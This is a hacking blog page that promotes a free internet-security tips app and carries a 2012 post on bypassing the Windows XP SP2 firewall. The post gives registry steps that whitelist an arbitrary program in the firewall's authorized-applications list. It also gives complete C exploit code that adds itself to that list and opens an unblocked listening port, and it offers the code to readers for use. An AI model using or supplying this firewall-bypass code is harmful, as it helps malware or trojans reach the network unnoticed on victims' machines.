Search This Blog

This is where I belong.

I was never intrested in the crap they teach us in college, because it bores me.

Its not about money nor about revenge, its about curiosity

My crime is of curiosity, my crime is of outsmarting you, something that you will never forgive me for.

We explore, We seek knowledge

We exist without skin color, without nationality, without religious bais.

Naive Security – Free internet security suite.

Are you sure you are safe online?

About 2 Lakh Facebook accounts were hacked on 15-NOV-12, 250000 Twitter accounts were hacked on 1-FEB-13 at the same time New York Times was hacked.

Protect yourself and people around you from such threats by using our free internet security solution Naive Security. It will help protect your information and your different accounts while you access them through internet.

Download For free

  • Features:
  • Information Security.
  • Password Security
  • Prevention from scams.
  • Wireless security.
  • Data Encryption.
  • Online banking security.
  • Mobile banking security.
  • Online shopping security.
  • Online privacy.
  • Social account security.
  • Kids security
  • Protection against latest security threats.

Codesortie
Showing posts with label Firewall. Show all posts
Showing posts with label Firewall. Show all posts

Thursday, 20 December 2012

Naive Security :: A guide to internet Security.

About Naive Security.


This app will provide tips which will help you to protect your information and your different accounts while you access them on your PC/MAC through internet. What’s the best part? Its free and available at your finger tips for many mobile platforms.


Who should use this?



This app is for everyone who is using a computer with or without internet. I have seen people who teach cyber security getting hacked. So, I won’t say that this app is only for naive user.

Many times things are in front of us but we are not able to identify them. This may happen in a hurry or in excitement or just due to ignorance.

This app is for all the people out there who take their security very seriously.

Why I developed this app?



Many people come to me for recovering their accounts after it has been hacked. I try my best to regain access to their accounts, sometimes I m successful but most of the times it’s not possible.

"Hackers cannot be hacked"




Just imagine, will a person having knowledge about all hacking techniques fall for these techniques? Obviously NO. It’s an old saying “Precaution is better than cure.” It’s time for all people to take precautions beforehand to make ourselves secure.


Free Download at: http://naivesecurity.tk/



Share it if you like it. Dont Foget to say thanks!

Introduction to Naive Security:: A guide to internet security.






hi,
Today we introduce you to a new mobile application which will help you prevent yourself from different threats over the internet. If you take your Security seriously then you are at the right place.

Naive Security - a guide to internet security

This app will provide tips which will help you to protect your information and your different accounts while you access them on your PC/MAC through internet. What’s the best part? Its free.

available free at ::  http://naivesecurity.tk/




Supported platforms :: android, blackberry, Symbian, windows phone, and web OS
coming soon for IOS devices.

Regards
thank you.

Monday, 23 January 2012

Bypassing Windows-XP Firewall

hey friends today i m going to tell you how you can by-pass Windows XP SP2 firewall.
  • There is a technique using which we can bypass windows-xp service pack-2 firewall.
  • This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
  • This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :-

Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-

The information has been provided by Mark Kica.

Vulnerable Systems :-

* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.

If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:

Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */


Hope you like it.!!!
Enjoy....!!!!